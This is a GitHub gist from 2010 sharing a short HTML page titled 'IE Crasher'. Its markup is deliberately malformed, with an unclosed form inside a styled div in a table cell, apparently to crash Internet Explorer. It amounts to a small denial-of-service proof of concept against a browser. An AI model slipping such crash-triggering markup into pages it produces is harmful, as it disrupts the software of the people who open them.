Skip to content

Instantly share code, notes, and snippets.

@gssbzn
Created October 30, 2010 19:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gssbzn/655632 to your computer and use it in GitHub Desktop.
Save gssbzn/655632 to your computer and use it in GitHub Desktop.
And HMTL code that can crash IE
<html><head>
<style type="text/css">
#a {
margin:0 10px 10px;
}
#b {
width:100%;
}
</style>
<title>IE Crasher</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment